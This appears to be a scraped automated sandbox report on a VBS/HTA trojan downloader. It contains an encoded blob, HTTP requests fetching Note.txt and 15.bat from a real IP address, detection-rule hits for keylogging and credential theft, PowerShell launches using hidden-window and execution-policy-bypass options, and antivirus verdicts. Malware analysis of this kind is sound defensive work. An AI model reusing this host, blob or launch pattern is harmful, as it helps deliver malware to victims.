pSJBpsxABrStWVksSonak42PUvTm67iuWP8cHYHXiF5t6XKNXUTDZa0Pwwfw7dhzx2G2kHOYsJV/lakvLUuUgeRKtpQ1Nc4DYzcs0g/Ru0sAKqYv1jGF3MFb9N1tyPoS4WJAKaR1BLDIT2tSYmkfv2ZbeO/ZKEMOFMS9CKSShgrbJLOC/cyP2MqDw/HaFN2idnAviSfQm3IiBWTQeE96ka4PWMGPMs62XlIi+ETonsIaZEtFOr6KKWFA0B2shwNESQpbL12UmYCYl4KA/RFpgdQnOiDpnmi1Q9vk/W1WyBu7siJqWaeOMVeicdMiQ0/wkZfiAZsCiQ0zyRDlydiOZ19Kpgh9rG+OnDw6Z3DSl6nzC7BmhpHBgDdZqYRkVW3+XTN/gYXmKw3yVjm2apq/Opi1jiberyfZNURia58L6KF4qh4J4qsgjny247IJlaLh8BCmDAlJh1caSeoZTPhiefAhfGtK3/sFqYWxu2mpqXi4f2KSzF9xxS+EhyxeWnUtHD8YZ95HtQYQcFDZCW/JiUF5rbq4tuHuP2A+fCfjyExSzec+/uUSJryK25XYddUJ5sGGaVv0R2Ay7MWxaG6VgtKp+uJdyd3pkDWTNhnqD0 |
Data sent | GET /Note.txt HTTP/1.1 Host: 193.222.96.128:7287 Connection: Keep-Alive |
Data sent | GET /15.bat HTTP/1.1 Host: 193.222.96.128:7287 |
description | Create a windows service | rule | Create_Service | ||||||
description | Communications over RAW Socket | rule | Network_TCP_Socket | ||||||
description | Communication using DGA | rule | Network_DGA | ||||||
description | Match Windows Http API call | rule | Str_Win32_Http_API | ||||||
description | Take ScreenShot | rule | ScreenShot | ||||||
description | Escalate priviledges | rule | Escalate_priviledges | ||||||
description | Steal credential | rule | local_credential_Steal | ||||||
description | PWS Memory | rule | Generic_PWS_Memory_Zero | ||||||
description | Record Audio | rule | Sniff_Audio | ||||||
description | Communications over HTTP | rule | Network_HTTP | ||||||
description | Communications use DNS | rule | Network_DNS | ||||||
description | Code injection with CreateRemoteThread in a remote process | rule | Code_injection | ||||||
description | (no description) | rule | DebuggerCheck__GlobalFlags | ||||||
description | (no description) | rule | DebuggerCheck__QueryInfo | ||||||
description | (no description) | rule | DebuggerCheck__RemoteAPI | ||||||
description | (no description) | rule | DebuggerHiding__Thread | ||||||
description | (no description) | rule | DebuggerHiding__Active | ||||||
description | (no description) | rule | DebuggerException__ConsoleCtrl | ||||||
description | (no description) | rule | DebuggerException__SetConsoleCtrl | ||||||
description | (no description) | rule | ThreadControl__Context | ||||||
description | (no description) | rule | SEH__vectored | ||||||
description | (no description) | rule | Check_Dlls | ||||||
description | Checks if being debugged | rule | anti_dbg | ||||||
description | Anti-Sandbox checks for ThreatExpert | rule | antisb_threatExpert | ||||||
description | Bypass DEP | rule | disable_dep | ||||||
description | Affect hook table | rule | win_hook | ||||||
description | File Downloader | rule | Network_Downloader | ||||||
description | Match Windows Inet API call | rule | Str_Win32_Internet_API | ||||||
description | Communications over FTP | rule | Network_FTP | ||||||
description | Run a KeyLogger | rule | KeyLogger | ||||||
description | Communications over P2P network | rule | Network_P2P_Win |
host | 193.222.96.128 |
file | C:\Users\test22\AppData\Roaming\Note.txt |
file | C:\Users\test22\AppData\Roaming\15.bat |
parent_process | powershell.exe | martian_process | C:\Users\test22\AppData\Roaming\15.bat | ||||||
parent_process | powershell.exe | martian_process | C:\Users\test22\AppData\Roaming\Note.txt | ||||||
parent_process | powershell.exe | martian_process | "C:\Windows\system32\NOTEPAD.EXE" C:\Users\test22\AppData\Roaming\Note.txt | ||||||
parent_process | powershell.exe | martian_process | "C:\Users\test22\AppData\Roaming\15.bat" |
option | -executionpolicy unrestricted | value | Attempts to bypass execution policy | ||||||
option | -executionpolicy unrestricted | value | Attempts to bypass execution policy | ||||||
option | -w hidden | value | Attempts to execute command with a hidden window |
Skyhigh | HTA/Downloader.f |
ALYac | VB:Trojan.Valyria.7482 |
VIPRE | VB:Trojan.Valyria.7482 |
Arcabit | VB:Trojan.Valyria.D1D3A |
ESET-NOD32 | VBS/Agent.QVR |
McAfee | HTA/Downloader.f |
Avast | Script:SNH-gen [Drp] |
Cynet | Malicious (score: 99) |
Kaspersky | HEUR:Trojan-Downloader.Script.Generic |
BitDefender | VB:Trojan.Valyria.7482 |
NANO-Antivirus | Trojan.Script.Downloader.jpdglv |
MicroWorld-eScan | VB:Trojan.Valyria.7482 |
Rising | Downloader.Agent/VBS!8.10EA5 (TOPIS:E0:RXmrIh5jYAI) |
Emsisoft | VB:Trojan.Valyria.7482 (B) |
F-Secure | Malware.VBS/Dldr.Agent.VPLT |
FireEye | VB:Trojan.Valyria.7482 |
Ikarus | Trojan.VBS.Agent |
Detected | |
Avira | VBS/Dldr.Agent.VPLT |
GData | VB:Trojan.Valyria.7482 |
Varist | VBS/Agent.AZC!Eldorado |
MAX | malware (ai score=86) |
Fortinet | VBS/Agent.BSD!tr |
AVG | Script:SNH-gen [Drp] |
file | C:\Windows\System32\ie4uinit.exe |
file | C:\Program Files\Windows Sidebar\sidebar.exe |
file | C:\Windows\System32\WindowsAnytimeUpgradeUI.exe |
file | C:\Windows\System32\xpsrchvw.exe |
file | C:\Windows\System32\displayswitch.exe |
file | C:\Program Files\Common Files\Microsoft Shared\ink\mip.exe |
file | C:\Windows\System32\mblctr.exe |
file | C:\Windows\System32\mstsc.exe |
file | C:\Windows\System32\SnippingTool.exe |
file | C:\Windows\System32\SoundRecorder.exe |
file | C:\Windows\System32\dfrgui.exe |
file | C:\Windows\System32\msinfo32.exe |
file | C:\Windows\System32\rstrui.exe |
file | C:\Program Files\Common Files\Microsoft Shared\ink\ShapeCollector.exe |
file | C:\Program Files\Windows Journal\Journal.exe |
file | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
file | C:\Windows\System32\MdSched.exe |
file | C:\Windows\System32\msconfig.exe |
file | C:\Windows\System32\recdisc.exe |
file | C:\Windows\System32\msra.exe |
file | C:\Windows\System32\notepad.exe |